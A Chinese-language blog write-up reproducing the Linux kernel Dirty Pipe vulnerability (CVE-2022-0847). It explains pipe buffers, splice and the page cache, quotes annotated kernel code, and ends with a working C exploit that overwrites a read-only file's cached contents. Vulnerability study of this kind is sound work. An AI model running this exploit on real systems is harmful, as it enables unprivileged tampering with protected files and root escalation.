CVE-2022-0847 Dirty Pipe

前言

持续性摆烂一段时间了，又想看jyy的课，又要期末考试了，好烦！索性花点时间把Gyan神上半年叫我复现的CVE复现了。

这个CVE允许向任意可读文件中写数据，可造成非特权进程向root进程注入代码。该漏洞发生在Linux内核通过splice方式实现数据拷贝时：内核以“零拷贝”的形式将文件缓存页直接挂到pipe上，却没有初始化pipe缓存页管理结构体(pipe_buffer)的flags成员。

零拷贝

首先需要了解一下零拷贝的概念，在普通的文件传输过程是如下图所示，可以看到这里进行了四次上下文切换，导致不必要的浪费和开销

所以linux内核提供了一种解决办法：快速高效地将数据从文件系统移动到网络接口，而不需要先把数据从内核空间复制到用户空间，这也就是所谓的零拷贝；linux内核中的splice就是其中一种实现方式。

这个系统调用不仅支持网络层面的传输：只要用户持有两个已经打开的文件描述符，并且其中至少一个是管道(pipe)，就可以用它在二者之间搬运数据，而不仅限于socket。

pipe原理

pipe在前面的利用中也使用到过，不过大多是利用它申请的结构体的堆块劫持ops或者泄漏，这里主要是使用他初始化会带来的内容。

首先我们清楚pipe会创建两个文件描述符，一个用于读、另一个用于写。在内核中pipe缓冲区的默认总长度是65536字节，一共16页；这些页在内存中并不连续，而是通过pipe_buffer数组(pipe->bufs)进行管理，并用head、tail两个下标把这个数组当作环形队列来使用。以前就提到过，pipe在内核中是下图这样的表现形式：

由pipe_buffer结构体指向page，而pipe_buffer结构体在往期kernel文章中有详细介绍，这里就不再赘述了。

/*
 * pipe_write() - write the data described by @from into the pipe behind
 * iocb->ki_filp (kernel excerpt; everything after the `out:` label is
 * elided in this listing, so the final return path is not shown).
 *
 * Visible behaviour, in order:
 *   1. A zero-length write returns 0 immediately.
 *   2. With no readers the caller gets SIGPIPE and ret = -EPIPE; with a
 *      watch queue attached (CONFIG_WATCH_QUEUE) ret = -EXDEV.
 *   3. Merge path: the sub-page remainder of the write may be appended to
 *      the most recently filled slot if that slot's flags contain
 *      PIPE_BUF_FLAG_CAN_MERGE and the data still fits in the page.
 *   4. Otherwise (or for whatever data is left) the loop takes a fresh page
 *      per ring slot, initialises the slot and copies up to PAGE_SIZE bytes
 *      into it, sleeping when the ring is full unless O_NONBLOCK is set.
 */
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;

	/* Null write succeeds. */
	if (unlikely(total_len == 0))
		return 0;

	__pipe_lock(pipe);

	/* Nobody can ever read this data: signal the writer and bail out. */
	if (!pipe->readers) {
		send_sig(SIGPIPE, current, 0);
		ret = -EPIPE;
		goto out;
	}

#ifdef CONFIG_WATCH_QUEUE
	/* Pipes with a watch queue attached reject ordinary writes. */
	if (pipe->watch_queue) {
		ret = -EXDEV;
		goto out;
	}
#endif

	/*
	 * Only wake up if the pipe started out empty, since
	 * otherwise there should be no readers waiting.
	 *
	 * If it wasn't empty we try to merge new data into
	 * the last buffer.
	 *
	 * That naturally merges small writes, but it also
	 * page-aligns the rest of the writes for large writes
	 * spanning multiple pages.
	 */
	head = pipe->head;
	was_empty = pipe_empty(head, pipe->tail);
	/* chars = the part of the write that does not fill a whole page. */
	chars = total_len & (PAGE_SIZE-1);
	if (chars && !was_empty) {
		unsigned int mask = pipe->ring_size - 1;
		/* (head - 1) is the slot that was filled most recently. */
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
		/* First free byte inside that slot's page. */
		int offset = buf->offset + buf->len;

		/*
		 * The only gates visible here are the CAN_MERGE bit in
		 * buf->flags and the "still fits in the page" length check;
		 * after that pipe_buf_confirm() is consulted (its semantics
		 * are not shown in this excerpt).  If they pass, the new
		 * bytes are copied straight into buf->page.
		 */
		if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
		    offset + chars <= PAGE_SIZE) {
			ret = pipe_buf_confirm(pipe, buf);
			if (ret)
				goto out;

			ret = copy_page_from_iter(buf->page, offset, chars, from);
			if (unlikely(ret < chars)) {
				ret = -EFAULT;
				goto out;
			}

			buf->len += ret;
			/* Everything was merged: nothing left for the loop. */
			if (!iov_iter_count(from))
				goto out;
		}
	}

	for (;;) {
		/* Readers may have gone away while we slept below. */
		if (!pipe->readers) {
			send_sig(SIGPIPE, current, 0);
			if (!ret)
				ret = -EPIPE;
			break;
		}

		head = pipe->head;
		if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
			unsigned int mask = pipe->ring_size - 1;
			struct pipe_buffer *buf = &pipe->bufs[head & mask];
			/* Reuse the cached spare page if one is available. */
			struct page *page = pipe->tmp_page;
			int copied;

			if (!page) {
				page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
				if (unlikely(!page)) {
					/* Keep a partial byte count if we already wrote something. */
					ret = ret ? : -ENOMEM;
					break;
				}
				pipe->tmp_page = page;
			}

			/* Allocate a slot in the ring in advance and attach an
			 * empty buffer.  If we fault or otherwise fail to use
			 * it, either the reader will consume it or it'll still
			 * be there for the next write.
			 */
			spin_lock_irq(&pipe->rd_wait.lock);

			/* Re-check fullness now that rd_wait.lock is held. */
			head = pipe->head;
			if (pipe_full(head, pipe->tail, pipe->max_usage)) {
				spin_unlock_irq(&pipe->rd_wait.lock);
				continue;
			}

			pipe->head = head + 1;
			spin_unlock_irq(&pipe->rd_wait.lock);

			/* Insert it into the buffer array */
			buf = &pipe->bufs[head & mask];
			buf->page = page;
			buf->ops = &anon_pipe_buf_ops;
			buf->offset = 0;
			buf->len = 0;
			/*
			 * This write path always assigns buf->flags: every slot
			 * it fills gets CAN_MERGE unless is_packetized(filp) is
			 * true, in which case it gets PIPE_BUF_FLAG_PACKET.
			 */
			if (is_packetized(filp))
				buf->flags = PIPE_BUF_FLAG_PACKET;
			else
				buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
			/* The page now belongs to the slot, not to the spare cache. */
			pipe->tmp_page = NULL;

			copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
			/* A short copy with data still pending is treated as a fault. */
			if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
				if (!ret)
					ret = -EFAULT;
				break;
			}
			ret += copied;
			buf->offset = 0;
			buf->len = copied;

			if (!iov_iter_count(from))
				break;
		}

		/* Still room in the ring: go round again without sleeping. */
		if (!pipe_full(head, pipe->tail, pipe->max_usage))
			continue;

		/* Wait for buffer space to become available. */
		if (filp->f_flags & O_NONBLOCK) {
			if (!ret)
				ret = -EAGAIN;
			break;
		}
		if (signal_pending(current)) {
			if (!ret)
				ret = -ERESTARTSYS;
			break;
		}

		/*
		 * We're going to release the pipe lock and wait for more
		 * space. We wake up any readers if necessary, and then
		 * after waiting we need to re-check whether the pipe
		 * become empty while we dropped the lock.
		 */
		__pipe_unlock(pipe);
		if (was_empty) {
			wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
			kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
		}
		wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
		__pipe_lock(pipe);
		was_empty = pipe_empty(pipe->head, pipe->tail);
		wake_next_writer = true;
	}
out:
	......
}

可以看到，函数的上半部分会先检查buf->flags是否带有PIPE_BUF_FLAG_CAN_MERGE，并验证待写入内容加上当前页内已有内容的长度不超过PAGE_SIZE；两者都满足时才会直接向该页执行copy操作。

如果未通过上半部分的验证(或者合并之后仍有数据没有写完)，就不会直接跳到out，而是进入下方的for循环：循环内会新申请一个page，并初始化对应的buf

注意：只要管道不是packet模式(is_packetized为假)，这里新初始化的buf->flags就是PIPE_BUF_FLAG_CAN_MERGE

漏洞分析

linux 内核page cache机制

linux 会把打开文件的内容放到缓存页(page cache)之中，缓存页被使用过后也会保留一段时间，以避免不必要的IO操作。短时间内访问同一个文件，操作的都是相同的文件缓存页，而不必反复从磁盘读取。因此只要我们通过该漏洞篡改了这个文件缓存页，短时间内访问(读取)该文件的操作就都会读到被篡改的内容，从而完成利用。

漏洞原理

splice 的零拷贝方法就是，直接用文件缓存页来替换pipe 中的缓存页(更改pipe缓存页指针指向文件缓存页)

这里漏洞出现在:

/*
 * copy_page_to_iter_pipe() - attach @page to the pipe behind iterator @i
 * without copying its contents (kernel excerpt, shown as quoted).
 *
 * @page:   page to reference from the pipe
 * @offset: start of the data inside @page
 * @bytes:  number of bytes requested; clamped to i->count
 * @i:      pipe-backed iterator (i->pipe, i->head, i->iov_offset are used)
 *
 * Returns the number of bytes accounted for, or 0 when there is nothing to
 * do, sanity(i) fails, or the ring is full.
 *
 * NOTE: when a new slot is set up, ops/page/offset/len are assigned but
 * buf->flags is not written anywhere in this function, so the slot keeps
 * whatever flags value it held before this call.
 */
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
			 struct iov_iter *i)
{
	struct pipe_inode_info *pipe = i->pipe;
	struct pipe_buffer *buf;
	unsigned int p_tail = pipe->tail;
	unsigned int p_mask = pipe->ring_size - 1;
	unsigned int i_head = i->head;
	size_t off;

	/* Never hand out more than the iterator still has room for. */
	if (unlikely(bytes > i->count))
		bytes = i->count;

	if (unlikely(!bytes))
		return 0;

	if (!sanity(i))
		return 0;

	off = i->iov_offset;
	buf = &pipe->bufs[i_head & p_mask];
	if (off) {
		/* Same page, contiguous data: just extend the current slot. */
		if (offset == off && buf->page == page) {
			/* merge with the last one */
			buf->len += bytes;
			i->iov_offset += bytes;
			goto out;
		}
		/* Otherwise move on to the next ring slot. */
		i_head++;
		buf = &pipe->bufs[i_head & p_mask];
	}
	if (pipe_full(i_head, p_tail, pipe->max_usage))
		return 0;

	/*
	 * Point the slot at the caller's page and take a reference on it;
	 * no data is copied.  buf->flags is left untouched here.
	 */
	buf->ops = &page_cache_pipe_buf_ops;
	get_page(page);
	buf->page = page;
	buf->offset = offset;
	buf->len = bytes;

	/* Publish the new slot and remember where the iterator stopped. */
	pipe->head = i_head + 1;
	i->iov_offset = offset + bytes;
	i->head = i_head;
out:
	i->count -= bytes;
	return bytes;
}

可以看到这里在最后是将page直接赋值给了buf，并且未初始化flags。也就是说，如果这个buf此前残留着PIPE_BUF_FLAG_CAN_MERGE标志，那么在splice让它指向目标文件的缓存页之后，我们就可以直接使用pipe_write向该缓存页追加写入。

利用思路

首先生成管道，并使用write填满整个管道，使每一个pipe_buffer的flags都被置为PIPE_BUF_FLAG_CAN_MERGE (下面截图中第一个结构体为pipe_inode_info)

随后read出pipe中的所有数据，使head和tail相等，清空pipe(此时各个pipe_buffer中残留的flags并不会被清除)

通过splice修改pipe->bufs->page指向文件缓存页
最后通过pipe_write写入内容

综上，得出exp

#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <stdint.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/prctl.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/*
 * Reproduction driver for the article's CVE-2022-0847 walkthrough.
 *
 * Steps (same as the original listing):
 *   1. open "/flag" read-only;
 *   2. create a pipe, write 16 page-sized chunks into it and read them back;
 *   3. splice() one byte from file offset 1 into the pipe;
 *   4. write() the marker string "196082" into the pipe.
 *
 * Every step is now checked, so a failure in the fill/drain phase or a
 * partial final write is reported instead of being printed as "success!".
 *
 * Returns EXIT_SUCCESS when all steps complete, EXIT_FAILURE otherwise.
 */
int main()
{
    enum { PIPE_SLOTS = 16 };   /* number of page-sized chunks to fill/drain */

    int p[2] = { -1, -1 };
    int fd = -1;
    int status = EXIT_FAILURE;
    char buffer[4096] = { 0 };  /* filler only; its content is irrelevant */
    loff_t offset = 1;
    const char data[] = "196082";
    const size_t data_size = sizeof(data) - 1;  /* exclude the trailing NUL */
    ssize_t nbytes;

    fd = open("/flag", O_RDONLY);
    if (fd < 0)
    {
        printf("[-] open failed!\n");
        goto out;
    }

    if (pipe(p))
        abort();

    /* Fill the pipe: each write must deposit one complete chunk. */
    for (int i = 0; i < PIPE_SLOTS; i++)
    {
        nbytes = write(p[1], buffer, sizeof(buffer));
        if (nbytes != (ssize_t)sizeof(buffer))
        {
            printf("[-] pipe fill failed!\n");
            goto out;
        }
    }

    /* Drain it again so the pipe is empty before the splice. */
    for (int i = 0; i < PIPE_SLOTS; i++)
    {
        nbytes = read(p[0], buffer, sizeof(buffer));
        if (nbytes != (ssize_t)sizeof(buffer))
        {
            printf("[-] pipe drain failed!\n");
            goto out;
        }
    }

    /* Move a single byte, starting at file offset 1, into the pipe. */
    nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
    if (nbytes < 0)
    {
        printf("[-] splice failed!\n");
        goto out;
    }
    if (nbytes == 0)
    {
        printf("[-] short splice!\n");
        goto out;
    }

    nbytes = write(p[1], data, data_size);
    if (nbytes < 0)
    {
        printf("[-] write failed!\n");
        goto out;
    }
    /* Anything less than the full marker counts as a short write. */
    if ((size_t)nbytes < data_size)
    {
        printf("[-] short write!\n");
        goto out;
    }

    printf("success!\n");
    status = EXIT_SUCCESS;

out:
    /* Release whatever was opened, on success and failure alike. */
    if (p[0] >= 0)
        close(p[0]);
    if (p[1] >= 0)
        close(p[1]);
    if (fd >= 0)
        close(fd);

    return status;
}

总的来说，这个CVE的利用不算是很难，后续我会将复现环境都打包到github上

参考链接:

https://mp.weixin.qq.com/s/6VhWBOzJ7uu80nzFxe5jpg

https://dirtypipe.cm4all.com/

打包链接:

https://github.com/196082/196082